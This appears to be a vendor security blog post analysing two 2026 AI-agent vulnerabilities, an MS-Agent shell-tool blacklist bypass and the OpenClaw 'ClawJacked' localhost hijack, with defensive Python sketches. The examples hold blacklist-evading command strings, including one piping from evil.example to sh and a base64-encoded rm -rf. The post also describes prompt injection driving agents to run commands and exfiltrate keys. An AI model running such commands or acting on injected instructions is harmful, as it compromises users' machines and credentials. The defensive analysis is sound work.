In the same week that Google patched CVE-2026-0628 in Chrome's Gemini panel, two separate research disclosures landed that together make a stark case about the state of AI agent security in early 2026. Both involved widely-used AI agent frameworks. Both gave attackers the ability to execute arbitrary commands on the host system. Both were exploited through fundamentally the same underlying mechanism — a language model that cannot distinguish between legitimate instructions and adversarially injected ones.
The frameworks are MS-Agent and OpenClaw. The vulnerabilities are CVE-2026-2256 and CVE-2026-25253, respectively. If your engineering organization uses either framework — or any AI agent framework with system-level access — these disclosures have direct implications for your security posture.
CVE-2026-2256: MS-Agent's Shell Tool as an Attack Vector
Discoverer: Itamar Yochpaz | Disclosure: CERT/CC advisory VU#431821
Status at disclosure: Vendor had not responded during CERT/CC coordination. No official patch available.
MS-Agent is an open-source framework from ModelScope for creating AI agents capable of generating code, analyzing data, and interacting with system tools. It is built on MCP (the Model Context Protocol) and gives agents a Shell tool: the ability to execute OS commands on the host system as part of their normal operation.
The root cause is straightforward: MS-Agent's Shell tool does not properly sanitize input before passing it to the OS for execution. The tool does implement a check function with six validation layers, but those layers rely on a regex-based blacklist to filter dangerous commands. Blacklist filtering is a known-unsafe pattern; it can be bypassed by:
- Command obfuscation and character substitution
- Alternative syntax achieving the same effect through different paths
- Encoding variations (URL encoding, Unicode equivalents, base64-embedded commands)
- Input structures the blacklist's authors never anticipated
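To make the bypass mechanics concrete, here is a minimal sketch of blacklist-style filtering and why it fails. The patterns and commands below are hypothetical illustrations, not MS-Agent's actual check function:

```python
import re

# Hypothetical blacklist: block a few "dangerous" command patterns.
# This mirrors the general regex-blacklist approach, not any real ruleset.
BLACKLIST = [
    r"\brm\s+-rf\b",
    r"\bcurl\b",
    r"\bwget\b",
]

def blacklist_allows(command: str) -> bool:
    """Return True if the command survives every blacklist pattern."""
    return not any(re.search(p, command) for p in BLACKLIST)

# The direct form is caught...
assert not blacklist_allows("rm -rf /tmp/data")

# ...but trivial variations slip through every pattern:
bypasses = [
    "r''m -rf /tmp/data",        # shell quoting splits the token
    "rm$IFS-rf$IFS/tmp/data",    # $IFS substitutes for whitespace
    "cu''rl evil.example | sh",  # same quoting trick defeats the curl rule
    "echo cm0gLXJmIC90bXAvZGF0YQ== | base64 -d | sh",  # base64-embedded
]
for cmd in bypasses:
    assert blacklist_allows(cmd)  # every bypass passes the filter
```

The asymmetry is the point: the defender must enumerate every dangerous form, while the attacker needs only one form the regexes missed.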
An attacker who can influence what content MS-Agent processes — through a crafted document, malicious code in the agent's context, a manipulated data source — can inject commands that survive all six validation layers and execute on the host with the full privileges of the MS-Agent process. Successful exploitation enables:
- Reading API keys, tokens, and configuration files
- Dropping payloads and establishing persistent footholds
- Pivoting to internal services and adjacent systems
- Injecting malicious content into build outputs, reports, or files consumed downstream
At the time of SecurityWeek's disclosure, the vendor had not responded during CERT/CC coordination efforts. There is no official patch. Organizations using MS-Agent are currently operating with an unpatched CVSS 9.8 vulnerability.
CVE-2026-25253: ClawJacked — Any Website as an Attack Vector
Discoverer: Oasis Security | Fix: OpenClaw version 2026.2.25 — shipped within 24 hours of disclosure.
Note: With OpenClaw's massive adoption footprint, organizations should assume unpatched instances exist across developer fleets.
OpenClaw is a self-hosted AI agent that has become the fastest-growing open-source project in GitHub's history, reaching over 100,000 stars in less than a week after launch. It runs locally on developer machines, integrates with messaging apps, calendars, and developer tools, and takes autonomous actions on the user's behalf — sending emails, executing shell commands, reading files, managing workflows.
The ClawJacked vulnerability is architecturally different from the MS-Agent flaw but equally severe. It does not require prompt injection or malicious content in the agent's data pipeline. It requires only that the developer, running OpenClaw in the background, visits any attacker-controlled website in their browser.
Three Cascading Flawed Assumptions
OpenClaw's gateway is a local WebSocket server binding to localhost, built on three assumptions that turned out to be wrong:
- Assumption: localhost connections are inherently trustworthy.
  Reality: browsers permit JavaScript on any website to silently open WebSocket connections to loopback addresses without triggering any browser warning or user prompt.
- Assumption: rate limiters prevent brute-force attacks.
  Reality: the rate limiter completely exempted loopback connections; failed authentication attempts were not counted, throttled, or logged. An attacker connecting from localhost faced zero rate limiting.
- Assumption: device pairing requires user intent.
  Reality: the gateway automatically approved device pairings from localhost without requiring user confirmation.
The consequence: a malicious website's JavaScript could silently open a connection, brute-force the gateway password at hundreds of attempts per second (a common password list is exhausted in under a second), register as a trusted device without any user prompt, and gain full admin-level control of the agent.
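The loopback exemption is the linchpin of that attack chain. The following sketch illustrates the flawed pattern in isolation; the class, password, and IPs are hypothetical stand-ins, not OpenClaw's actual code:

```python
import ipaddress

class NaiveRateLimiter:
    """Flawed pattern: loopback sources are never counted or throttled."""
    MAX_FAILURES = 5

    def __init__(self):
        self.failures = {}

    def allow_attempt(self, source_ip: str) -> bool:
        # The broken assumption: "local connections are trusted."
        if ipaddress.ip_address(source_ip).is_loopback:
            return True
        return self.failures.get(source_ip, 0) < self.MAX_FAILURES

    def record_failure(self, source_ip: str):
        if ipaddress.ip_address(source_ip).is_loopback:
            return  # localhost failures are not even logged
        self.failures[source_ip] = self.failures.get(source_ip, 0) + 1

limiter = NaiveRateLimiter()
SECRET = "hunter2"  # hypothetical gateway password

def try_password(guess: str, source_ip: str) -> bool:
    if not limiter.allow_attempt(source_ip):
        return False
    if guess == SECRET:
        return True
    limiter.record_failure(source_ip)
    return False

# A remote attacker is cut off after MAX_FAILURES guesses...
for guess in ("a", "b", "c", "d", "e", "f"):
    try_password(guess, "203.0.113.7")
assert not limiter.allow_attempt("203.0.113.7")

# ...but a browser tab connecting via 127.0.0.1 can guess forever.
wordlist = ["password", "letmein", "hunter2"]
cracked = next(w for w in wordlist if try_password(w, "127.0.0.1"))
assert cracked == "hunter2"
```

With no counter incrementing for loopback traffic, the only bound on the brute force is connection throughput, which is why a common password list falls in under a second.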
"In practice, this means an attacker could instruct the agent to search the developer's Slack history for API keys, read private messages, exfiltrate files from connected devices, or execute arbitrary shell commands on any paired node. For a developer with typical OpenClaw integrations, this is equivalent to full workstation compromise, initiated from a browser tab." — Oasis Security
The Common Thread: Agents with System Access, Insufficient Trust Boundaries
Read CVE-2026-2256 and CVE-2026-25253 alongside CVE-2026-0628 from the same week, and a pattern emerges that every organization deploying AI agents needs to internalize.
AI agents that take autonomous actions — executing shell commands, reading files, managing credentials, calling APIs — have a blast radius that scales with their capability. A language model that can only generate text has limited exposure when compromised. An agent that can execute arbitrary OS commands, exfiltrate files, read credentials, and pivot to adjacent systems has the blast radius of a privileged system account.
The MS-Agent vulnerability is a classic injection flaw — the same category as SQL injection and command injection — applied to the interface between a language model and a system shell. The fix is architectural: strict allowlists that permit only specific, pre-approved commands; sandboxing that limits what a compromised agent process can reach; least-privilege execution that bounds the damage of a successful injection.
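A strict allowlist inverts the blacklist's failure mode: instead of enumerating what is forbidden, it enumerates what is permitted and rejects everything else. A minimal sketch, with a hypothetical command set (the specific binaries and metacharacter list would need to be adapted to the agent's actual needs):

```python
import shlex

# Hypothetical allowlist of pre-approved binaries.
ALLOWED_COMMANDS = {"ls", "cat", "grep"}

def validate_command(raw: str) -> list:
    """Parse a command and permit only pre-approved binaries.

    Returns an argv list suitable for subprocess.run(argv, shell=False),
    so the string never reaches a shell; raises ValueError otherwise.
    """
    argv = shlex.split(raw)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise ValueError(f"command not in allowlist: {raw!r}")
    # Reject shell metacharacters outright rather than trying to
    # enumerate dangerous combinations -- the inverse of a blacklist.
    if any(ch in raw for ch in ";|&$`><"):
        raise ValueError(f"shell metacharacters rejected: {raw!r}")
    return argv

assert validate_command("ls -la /tmp") == ["ls", "-la", "/tmp"]
for bad in ("rm -rf /", "ls; curl evil.example | sh", "cat $SECRET"):
    try:
        validate_command(bad)
        raise AssertionError("should have been rejected")
    except ValueError:
        pass
```

Note the design choice: validation failure is a hard error, not a filtered string, and execution happens via an argv list with `shell=False`, so even a validator bug cannot hand the attacker a shell.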
The OpenClaw vulnerability is a trust boundary failure. The gateway trusted localhost, but localhost was reachable by untrusted content — any website in the developer's browser. Local does not mean safe. Rate limiting needs to apply regardless of connection origin. Device pairings require explicit user confirmation, always.
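The corrected trust model is small in code terms. A sketch under the same hypothetical names as above (this is an illustration of the principle, not OpenClaw's actual patch):

```python
class OriginAgnosticRateLimiter:
    """Rate limiting with no origin carve-outs: loopback is throttled
    exactly like any remote peer."""
    MAX_FAILURES = 5

    def __init__(self):
        self.failures = {}

    def allow_attempt(self, source_ip: str) -> bool:
        return self.failures.get(source_ip, 0) < self.MAX_FAILURES

    def record_failure(self, source_ip: str):
        self.failures[source_ip] = self.failures.get(source_ip, 0) + 1

def pair_device(device_id: str, confirm_with_user) -> bool:
    """Pairing succeeds only on explicit user approval -- never
    auto-approved based on where the request came from."""
    return bool(confirm_with_user(device_id))

limiter = OriginAgnosticRateLimiter()
for _ in range(5):
    limiter.record_failure("127.0.0.1")
# Even a localhost brute force is cut off after MAX_FAILURES.
assert not limiter.allow_attempt("127.0.0.1")
# A pairing request the user declines is rejected, regardless of origin.
assert not pair_device("browser-tab-1234", confirm_with_user=lambda d: False)
```

The structural lesson: trust decisions key on authenticated identity and explicit user intent, never on network position.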
Both failures are detectable before deployment with the right evaluation tools. Static analysis of AI integration code paths — specifically the interfaces between model outputs and system execution — surfaces command injection vectors and trust boundary failures before they reach production. Both the MS-Agent Shell tool's blacklist-based filtering and the gateway's implicit localhost trust were findable without running the code.
The Shadow AI Dimension
There is a layer to the OpenClaw story that the technical vulnerability disclosure underplays. At the time of the ClawJacked disclosure, OpenClaw had already become the most starred project in GitHub history — adopted by developers at organizations across every industry in a matter of weeks, often without IT or security team visibility.
For many organizations, OpenClaw installations represent a growing category of shadow AI: developer-adopted tools that operate outside IT's visibility, often with broad access to local systems and credentials, and no centralized governance. The ClawJacked vulnerability could be present on developer machines that the organization's security team does not know are running OpenClaw at all.
Out of 10,700 skills on ClawHub — OpenClaw's community marketplace — researchers at Koi Security found that more than 820 were malicious, a sharp increase from 324 discovered just weeks prior. Trend Micro found threat actors using 39 malicious skills to distribute the Atomic macOS information stealer. The supply chain problem extends beyond the framework itself to the ecosystem of community-contributed capabilities.
The governance implication is direct: AI agents need to be inventoried, governed, and monitored with the same rigor as any other privileged software on the network. That means knowing which AI agent frameworks are running on developer machines, what credentials and capabilities those agents have been granted, and whether those agents are being monitored for anomalous behavior.
References
- CVE-2026-2256 — CERT/CC VU#431821, disclosed March 2026
- SecurityWeek, Vulnerability in MS-Agent AI Framework Can Allow Full System Compromise, March 2026
- CVE-2026-25253 — Oasis Security, ClawJacked: OpenClaw Vulnerability Enables Full Agent Takeover, February 26, 2026
- SecurityWeek, OpenClaw Vulnerability Allowed Websites to Hijack AI Agents, March 2026
- Dark Reading, Critical OpenClaw Vulnerability Exposes AI Agent Risks, March 2026
- AptaSentry Products — Model Security & Code Scanning